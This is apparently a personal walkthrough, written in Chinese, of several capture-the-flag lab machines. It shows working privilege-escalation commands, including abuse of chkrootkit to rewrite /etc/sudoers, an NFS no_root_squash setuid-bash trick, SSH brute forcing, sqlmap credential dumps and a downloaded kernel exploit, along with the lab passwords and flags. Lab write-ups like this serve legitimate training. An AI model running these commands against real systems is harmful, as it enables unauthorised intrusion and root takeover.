history - /etc/passwd - john 而已 - 看 corntab - /etc/cron.daily/ 下面有很多檔案 - 上網查 exploit - https://www.exploit-db.com/exploits/33899 - 這看起來可以用,試試 ``` www-data@ubuntu:/etc/cron.daily$ echo "touch /tmp/123123" > /tmp/update echo "touch /tmp/123123" > /tmp/update www-data@ubuntu:/etc/cron.daily$ ./chkrootkit ./chkrootkit www-data@ubuntu:/etc/cron.daily$ ls /tmp ls /tmp 123 cve_2016_0728.c meow meow.c meow2.c php.socket-0 update www-data@ubuntu:/etc/cron.daily$ ls /tmp ls /tmp 123 123123 cve_2016_0728.c meow meow.c meow2.c php.socket-0 update www-data@ubuntu:/etc/cron.daily$ ls -al /tmp ls -al /tmp total 60 drwxrwxrwt 2 root root 4096 Mar 22 23:07 . drwxr-xr-x 22 root root 4096 Mar 30 2016 .. -rw-r--r-- 1 www-data www-data 10189 Mar 22 22:42 123 -rw-r--r-- 1 root root 0 Mar 22 23:07 123123 -rw-r--r-- 1 www-data www-data 4500 Mar 22 23:01 cve_2016_0728.c -rwxr-xr-x 1 www-data www-data 12101 Mar 22 22:55 meow -rw-r--r-- 1 www-data www-data 6382 Mar 22 22:52 meow.c -rw-r--r-- 1 www-data www-data 6242 Mar 22 22:55 meow2.c srwxr-xr-x 1 www-data www-data 0 Mar 23 2019 php.socket-0 -rwxr-xr-x 1 www-data www-data 18 Mar 22 23:05 update ``` - 可以用! 那我們就有很多方式可以提權了,直接改 sudoers 然後執行 `sudo /bin/bash` ``` www-data@ubuntu:/etc/cron.daily$ echo "chmod 777 /etc/sudoers" > /tmp/update echo "chmod 777 /etc/sudoers" > /tmp/update www-data@ubuntu:/etc/cron.daily$ cat /tmp/update cat /tmp/update chmod 777 /etc/sudoers www-data@ubuntu:/etc/cron.daily$ ./chkrootkit ./chkrootkit www-data@ubuntu:/etc/cron.daily$ echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers <aily$ echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers www-data@ubuntu:/etc/cron.daily$ cat /etc/sudoers cat /etc/sudoers # # This file MUST be edited with the 'visudo' command as root. # # Please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file. # # See the man page for details on how to write a sudoers file. # Defaults env_reset Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" # Host alias specification # User alias specification # Cmnd alias specification # User privilege specification root ALL=(ALL:ALL) ALL # Members of the admin group may gain root privileges %admin ALL=(ALL) ALL # Allow members of group sudo to execute any command %sudo ALL=(ALL:ALL) ALL # See sudoers(5) for more information on "#include" directives: #includedir /etc/sudoers.d www-data ALL=NOPASSWD: ALL www-data@ubuntu:/etc/cron.daily$ sudo /bin/sh sudo /bin/sh sudo: /etc/sudoers is mode 0777, should be 0440 sudo: no valid sudoers sources found, quitting sudo: unable to initialize policy plugin www-data@ubuntu:/etc/cron.daily$ sudo /bin/bash sudo /bin/bash sudo: /etc/sudoers is mode 0777, should be 0440 sudo: no valid sudoers sources found, quitting sudo: unable to initialize policy plugin www-data@ubuntu:/etc/cron.daily$ echo "chmod 0440 /etc/sudoers" > /tmp/update echo "chmod 0440 /etc/sudoers" > /tmp/update www-data@ubuntu:/etc/cron.daily$ cat /tmp/update cat /tmp/update chmod 0440 /etc/sudoers www-data@ubuntu:/etc/cron.daily$ ./chkrootkit ./chkrootkit www-data@ubuntu:/etc/cron.daily$ ls -al /etc/sudoers ls -al /etc/sudoers -rwxrwxrwx 1 root root 750 Mar 22 23:14 /etc/sudoers www-data@ubuntu:/etc/cron.daily$ ./chkrootkit ./chkrootkit www-data@ubuntu:/etc/cron.daily$ ls -al /etc/sudoers ls -al /etc/sudoers -r--r----- 1 root root 750 Mar 22 23:14 /etc/sudoers www-data@ubuntu:/etc/cron.daily$ sudo /bin/bash sudo /bin/bash root@ubuntu:/etc/cron.daily# id id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/etc/cron.daily# cd /root cd /root root@ubuntu:~# ls ls 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz chkrootkit-0.49 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt newRule root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually. Thanks for giving this try. @vulnhub: Thanks for hosting this UP!. root@ubuntu:~# ``` # vulnix ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 16:16 CST Nmap scan report for 172.20.10.2 Host is up (0.0013s latency). Not shown: 988 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 79/tcp open finger 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 512/tcp open exec 513/tcp open login 514/tcp open shell 993/tcp open imaps 995/tcp open pop3s 2049/tcp open nfs Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds ``` - 看起來很多服務呢,初步看起來會是一個 mail server,不過我們先進一步 fuzz 看看 - 看到 513 514 2049 的名字讓我們很感興趣!先連上去看看! - 513 514 nc 過去都沒有反應 - 2049 看起來是 nfs(network filesystem),使用 metaexploit 試試看 - 可參考:https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/nfs/nfsmount.md ``` ./msfconsole use auxiliary/scanner/nfs/nfsmount set RHOSTS 172.20.10.2 msf auxiliary(scanner/nfs/nfsmount) > exploit [+] 172.20.10.2:111 - 172.20.10.2 NFS Export: /home/vulnix [*] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` - 我們確定他有一個 `/home/vulnix` 的資料夾 - 近一步使用 nmap 確認 ``` nmap -p 111 --script=nfs-showmount 172.20.10.2 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 16:26 CST Nmap scan report for 172.20.10.2 Host is up (0.00082s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /home/vulnix * Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds ``` - 好!看起來這可能是有趣的資料夾,直接 mount 起來看看 - `mount -t nfs 172.20.10.2:/home/vulnix 你的資料夾 - `drwxr-x--- 2 2008 2008 4096 Sep 3 2012 temp` - 看起來沒權限,哭哭,找其他方法吧 - 79 port - finger 應該是一個可以查詢用戶的 port ``` nc 172.20.10.2 79 user Login: user Name: user Directory: /home/user Shell: /bin/bash Never logged in. No mail. No Plan. Login: dovenull Name: Dovecot login user Directory: /nonexistent Shell: /bin/false Never logged in. No mail. No Plan. nc 172.20.10.2 79 root Login: root Name: root Directory: /root Shell: /bin/bash Never logged in. No mail. No Plan. nc 172.20.10.2 79 vulnix Login: vulnix Name: Directory: /home/vulnix Shell: /bin/bash Never logged in. No mail. No Plan. ``` - 我們知道大概的用戶列表了,看到有 `user`、`vulnix` 以及親愛的 `root` - 爆破 ssh password 看看囉! ``` hydra -l vulnix -P rockyou.txt -t 10 ssh://172.20.10.2 hydra -l user -P rockyou.txt -t 10 ssh://172.20.10.2 Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-26 16:45:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 10 tasks per 1 server, overall 10 tasks, 14344398 login tries (l:1/p:14344398), ~1434440 tries per task [DATA] attacking ssh://172.20.10.2:22/ [STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344288 to do in 2173:23h, 10 active [STATUS] 78.67 tries/min, 236 tries in 00:03h, 14344162 to do in 3039:02h, 10 active [STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343888 to do in 3281:17h, 10 active [22][ssh] host: 172.20.10.2 login: user password: letmein 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-03-26 16:52:15 ``` - 好慢喔,在等的同時發現 `finger` 有 exploit 好像可以用,我們用看看 - https://zarsec2.wordpress.com/2018/07/29/command-injection-using-finger-service/ - 好像不行 ## shell - 爆出來啦 user/letmein,直接登入 - `find /etc -perm -2 ! -type l -ls 2>/dev/null` - 沒 - gcc g++ - 沒 - sudo -l - 沒 - ps axu - 沒可疑的 - uname -a - 沒 gcc g++ ## 回頭 exploit nfs - ``drwxr-x--- 2 2008 2008 4096 Sep 3 2012 temp` - 這個很可疑,2008 代表是 uid,username 則是 `/home/vulnix` 的 vulnix - 我們試試看 exploit - 建立一個 uid 為 2008,名稱為 vulnix 的用戶然後 mount 起來存取看看 ``` useradd -u 2008 vulnix usermod -s /bin/bash -u 2008 -l vulnix vulnix vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/mnt We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for vulnix: vulnix vulnix is not in the sudoers file. This incident will be reported. ## 沒有權限使用 sudo,切回去 root 改一下檔案 ## 反正這台也是測試用的跳板機 root@red:/tmp# echo "vulnix ALL=(ALL:ALL) ALL">>/etc/sudoers root@red:/tmp# su vulnix vulnix@red:/tmp$ vulnix@red:/tmp$ sudo mount 172.20.10.2:/home/vulnix /tmp/mnt sudo mount 172.20.10.2:/home/vulnix /tmp/mnt mount: wrong fs type, bad option, bad superblock on 172.20.10.2:/home/vulnix, missing codepage or helper program, or other error (for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program) In some cases useful info is found in syslog - try dmesg | tail or so. vulnix@red:/tmp$ sudo aptitude install nfs-common ## 中間安裝過程略 ## 網路上查了一下 沒裝好像動不了 vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/mnt vulnix@red:/tmp$ ls -al ls -al total 36 drwxrwxrwt 8 root root 4096 Mar 26 20:45 . drwxr-xr-x 22 root root 4096 Jun 7 2016 .. drwxrwxrwt 2 root root 4096 Mar 26 20:33 .font-unix drwxrwxrwt 2 root root 4096 Mar 26 20:33 .ICE-unix -rw-rw-rw- 1 root root 11 Mar 26 20:40 meow drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 mnt drwxrwxrwt 2 root root 4096 Mar 26 20:33 .Test-unix drwxrwxrwt 2 root root 4096 Mar 26 20:33 .X11-unix drwxrwxrwt 2 root root 4096 Mar 26 20:33 .XIM-unix vulnix@red:/tmp$ cd mnt vulnix@red:/tmp/mnt$ ls -al ls -al total 20 drwxr-x--- 2 vulnix vulnix 4096 Sep 2 2012 . drwxrwxrwt 8 root root 4096 Mar 26 20:45 .. -rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout -rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc -rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile ``` - 至此,我們確定已經成功 mount 該機器上的 mount 資料夾,接著只要把 ssh key 放上去即可免密碼登入 ``` mkdir .ssh echo "你的 ssh-key">.ssh/authorized_keys ssh -i ~/.ssh/id_rsa vulnix@172.20.10.2 Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Tue Mar 26 10:19:13 GMT 2019 System load: 0.03 Processes: 93 Usage of /: 90.3% of 773MB Users logged in: 1 Memory usage: 3% IP address for eth0: 172.20.10.2 Swap usage: 0% => / is using 90.3% of 773MB Graph this data and manage this system at https://landscape.canonical.com/ New release '14.04.6 LTS' available. Run 'do-release-upgrade' to upgrade to it. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. ``` - 至此,成功登入普通使用者! ## user to root - sudo -l ``` Matching 'Defaults' entries for vulnix on this host: env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User vulnix may run the following commands on this host: (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports vulnix@vulnix:~$ sudoedit /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # /home/vulnix *(rw,no_root_squash) ``` - 改為 `no_root_squash` 之後就可以用 root 存取此資料夾了 - 如果沒有改,root 存取時會被當成匿名使用者看待 - 重開 vm 然後重新 mount ``` mount: only root can use "--types" option vulnix@red:/tmp$ sudo mount -t nfs 172.20.10.2:/home/vulnix /tmp/123123 root@red:/tmp/123123# cp /bin/bash . cp /bin/bash . root@red:/tmp/123123# ls ls bash sudoedit root@red:/tmp/123123# ls -al ls -al total 2004 drwxr-x--- 4 vulnix vulnix 4096 Mar 26 14:25 . drwxrwxrwt 9 root root 4096 Mar 26 22:06 .. -rwxr-xr-x 1 root root 1109520 Mar 26 14:25 bash -rw------- 1 vulnix vulnix 198 Mar 26 14:14 .bash_history drwx------ 2 vulnix vulnix 4096 Mar 26 13:39 .cache drwxrwxr-x 2 vulnix vulnix 4096 Mar 26 13:38 .ssh -rwxr-xr-x 1 vulnix vulnix 920788 Mar 26 14:13 sudoedit root@red:/tmp/123123# chmod 7555 bash chmod 7555 bash root@red:/tmp/123123# ls ls bash sudoedit ## 登入 vulnix vulnix@vulnix:~$ ./bash -l bash-4.3$ id uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) bash-4.3$ exit logout vulnix@vulnix:~$ ./bash -p bash-4.3# id uid=2008(vulnix) gid=2008(vulnix) euid=0(root) egid=0(root) groups=0(root),2008(vulnix) bash-4.3# cd /root bash-4.3# ls trophy.txt bash-4.3# cat trophy.txt cc614640424f5bd60ce5d5264899c3be ``` # VulnOSv2 ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 00:22 CST Nmap scan report for 172.20.10.2 Host is up (0.0040s latency). Not shown: 997 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6667/tcp open irc Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds ``` ## 80 port - 看 icon 是 drupal,直接玩看看 CVE 囉 - cve-2018-7600 unexploitable - 一直失敗先放棄 - dirsearch ``` [00:31:38] 301 - 317B - /jabc/includes -> http://172.20.10.2/jabc/includes/ [00:31:38] 200 - 10KB - /jabc/includes/ [00:31:39] 200 - 9KB - /jabc/index.php [00:31:39] 200 - 3KB - /jabc/install.php [00:31:42] 301 - 313B - /jabc/misc -> http://172.20.10.2/jabc/misc/ [00:31:42] 301 - 316B - /jabc/modules -> http://172.20.10.2/jabc/modules/ [00:31:46] 301 - 317B - /jabc/profiles -> http://172.20.10.2/jabc/profiles/ [00:31:46] 200 - 743B - /jabc/profiles/standard/standard.info [00:31:46] 200 - 271B - /jabc/profiles/minimal/minimal.info [00:31:46] 200 - 278B - /jabc/profiles/testing/testing.info [00:31:47] 200 - 2KB - /jabc/robots.txt [00:31:48] 301 - 316B - /jabc/scripts -> http://172.20.10.2/jabc/scripts/ [00:31:48] 200 - 948B - /jabc/scripts/ [00:31:49] 301 - 314B - /jabc/sites -> http://172.20.10.2/jabc/sites/ [00:31:52] 301 - 318B - /jabc/templates -> http://172.20.10.2/jabc/templates/ [00:31:52] 200 - 975B - /jabc/templates/ [00:31:52] 301 - 315B - /jabc/themes -> http://172.20.10.2/jabc/themes/ [00:31:55] 200 - 42B - /jabc/xmlrpc.php ``` - documention 藏字 ``` Documentation ============= Dear customer, For security reasons, this section is hidden. For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest Thank you. 2019 © Vulnerable since 1980 Theme by [itapplication.net](http://itapplication.net). ``` - http://172.20.10.2/jabcd0cs/ - opendocman - fuzzing - 登入後可以上傳檔案 - http://172.20.10.2/jabcd0cs/error.php?ec=13&last_message=%3Cimg%20src=x%3E - XSS ``` Current allowed filetypes: - image/gif - text/html - text/plain - application/pdf - image/pdf - application/x-pdf - application/msword - image/jpeg - image/pjpeg - image/png - application/msexcel - application/msaccess - text/richtxt - application/mspowerpoint - application/octet-stream - application/x-zip-compressed - application/zip - image/tiff - image/tif - application/vnd.ms-powerpoint - application/vnd.ms-excel - application/vnd.openxmlformats-officedocument.presentationml.presentation - application/vnd.openxmlformats-officedocument.wordprocessingml.document - application/vnd.openxmlformats-officedocument.spreadsheetml.sheet - application/vnd.oasis.opendocument.chart - application/vnd.oasis.opendocument.chart-template - application/vnd.oasis.opendocument.formula - application/vnd.oasis.opendocument.formula-template - application/vnd.oasis.opendocument.graphics - application/vnd.oasis.opendocument.graphics-template - application/vnd.oasis.opendocument.image - application/vnd.oasis.opendocument.image-template - application/vnd.oasis.opendocument.presentation - application/vnd.oasis.opendocument.presentation-template - application/vnd.oasis.opendocument.spreadsheet - application/vnd.oasis.opendocument.spreadsheet-template - application/vnd.oasis.opendocument.text - application/vnd.oasis.opendocument.text-master - application/vnd.oasis.opendocument.text-template - application/vnd.oasis.opendocument.text-web - text/csv - image/x-dwg - image/x-dfx - drawing/x-dwf - application/x-httpd-php - application/x-httpd-php5 ``` - php 欸 - 傳上去看看 - 不行 - 找看看 cve - https://www.exploit-db.com/exploits/32075 - sql injection ``` sqlmap -u "172.20.10.2/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk 3 --dbms=mysql -T odm_user --columns --dump Database: jabcd0cs Table: odm_user [3 entries] +----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ | id | phone | Email | username | password | last_name | first_name | department | pw_reset_code | +----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ | 1 | 5555551212 | webmin@example.com | webmin | b78aae356709f8c31118ea613980954b | min | web | 2 | <blank> | | 2 | 555 5555555 | guest@example.com | guest | 084e0343a0486ff05530df6c705c8bb4 | guest | guest | 2 | NULL | | 3 | <?php phpinfo();?> | asd@gmail.com | <?php phpinfo();?> | 4892e097d45fbe62fe5a9fe6c9836aaf | <?php phpinfo();?> | <?php phpinfo();?> | 2 | NULL | +----+--------------------+--------------------+--------------------+----------------------------------+--------------------+--------------------+------------+---------------+ 拿上網路爆一下 webmin/webmin1980 ``` - exploit - 登入,增加 `application/php` - 不行 - ssh - 直接登入啦! ## P1 -> root - `python -c 'import _pty_; _pty_.spawn("/bin/bash")'` - `find /etc -perm -2 ! -type l -ls 2>/dev/null` ``` webmin@VulnOSv2:~$ find /etc -perm -2 ! -type l -ls 2>/dev/null 639 4 drwxrwxrwx 4 root root 4096 Apr 16 2016 /etc/drupal/7/sites 646 4 -rwxrwxrwx 1 root www-data 576 Apr 16 2016 /etc/drupal/7/sites/default/dbconfig.php 642 20 -rwxrwxrwx 1 root root 18599 Jan 15 2014 /etc/drupal/7/sites/default/settings.php ``` - `uname -a` - Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux - https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2015/CVE-2015-1328/37292.c ``` webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs webmin@VulnOSv2:/tmp$ ./ofs spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),1001(webmin) # whoami root ``` # HackTheBox - Teacher ## nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 16:22 CST Nmap scan report for 10.10.10.153 Host is up (0.29s latency). Not shown: 999 closed ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 40.83 seconds ``` - 80 port 而已 ## 80 port - dirsearch - 掃到有 moodle - 其他不重要 - http://10.10.10.153/gallery.html - 網頁註解很可疑 - 圖片有藏字 ``` Hi Servicedesk, I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha. Could you guys figure out what the last charachter is, or just reset it? Thanks, Giovanni ``` - 爆破密碼,intruder 爆破一下就出來了 - Giovanni/Th4C00lTheacha# - 成功登入 ## exploit - 查到這篇 exploit - https://blog.ripstech.com/2018/moodle-remote-code-execution/ - ez - ![](https://images.plurk.com/2Dh6d9aiau2GyxLLH47x5l.png) - config.php ``` <?php // Moodle configuration file unset($CFG); global $CFG; $CFG = new stdClass(); $CFG->dbtype = 'mariadb'; $CFG->dblibrary = 'native'; $CFG->dbhost = 'localhost'; $CFG->dbname = 'moodle'; $CFG->dbuser = 'root'; $CFG->dbpass = 'Welkom1!'; $CFG->prefix = 'mdl_'; $CFG->dboptions = array ( 'dbpersist' => 0, 'dbport' => 3306, 'dbsocket' => '', 'dbcollation' => 'utf8mb4_unicode_ci', ); $CFG->wwwroot = 'http://10.10.10.153/moodle'; $CFG->dataroot = '/var/www/moodledata'; $CFG->admin = 'admin'; $CFG->directorypermissions = 0777; require_once(__DIR__ . '/lib/setup.php'); // There is no php closing tag in this file, // it is intentional because it prevents trailing whitespace problems! ``` - 進去 db 撈密碼,這組很可疑 - Giovannibak | 7a860966115182402ed06375cf0a22af - expelled - 試試看登入該用戶 - 成功 ``` www-data@teacher:/var/www/html/moodle$ su giovanni su giovanni Password: expelled giovanni@teacher:/var/www/html/moodle$ ``` ## P1 -> root - `~/work/tmp` - 下面會幫你備份資料夾,而且是用 root 的權限備份 - 那我們就把備份的資料夾 link 到 /root - final exploit - `ln -s /root ../courses` - wait for backup - tar xvzf backup_courses.tar.gz - cat root.txt - 4f3a83b42ac7723a508b8ace7b8b1209 # Netmon - nmap ``` Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 21:16 CST Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 0.90% done Nmap scan report for 10.10.10.152 Host is up (0.26s latency). Not shown: 995 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds Nmap done: 1 IP address (1 host up) scanned in 18.22 seconds ```